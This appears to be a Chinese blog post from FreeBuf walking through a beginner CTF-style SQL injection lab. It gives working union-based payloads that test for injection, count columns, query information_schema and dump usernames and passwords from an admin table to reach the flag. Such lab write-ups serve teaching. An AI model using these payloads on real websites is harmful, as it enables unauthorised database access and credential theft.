第一章:为了女神小芳!
铁壁阿童木Y
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
第一章:为了女神小芳!

1.得到站点目标
2.打开已给网站并查找注入点
3.进行测试
and 1 = 1 # 页面显示正常 and 1 = 2 # 页面显示异常
4.查询字段数
?id=1 order by 3 # 页面显示异常 ?id=1 order by 2 # 页面显示正常
5.查看返回值
?id=4 union select 1,2#
6.常见信息查询
?id=4 union select 1,database()# maoshe
?id=4 union select 1,user()# maoshe@localhost
?id=4 union select 1,version()# 5.5.53 存在information_schema数据库
7.查看数据库下的表
?id=4 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'# 关键信息 admin表
8.查看表下的列名
?id=4 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
9.查看列下的具体数据
?id=4 union select 1,group_concat(id,username,password) from admin #
10.得到目标flag
hellohack
11.总结
(1)先测试是否存在注入点 (2)再查看返回点 (3)从数据库到表到列名最后到具体数据,一步一步
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 铁壁阿童木Y 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏

第五章:SYSTEM!POWER!
2023-02-06
第四章:进击!拿到Web最高权限!
2023-01-03
FofaViewer的安装与使用
2022-12-28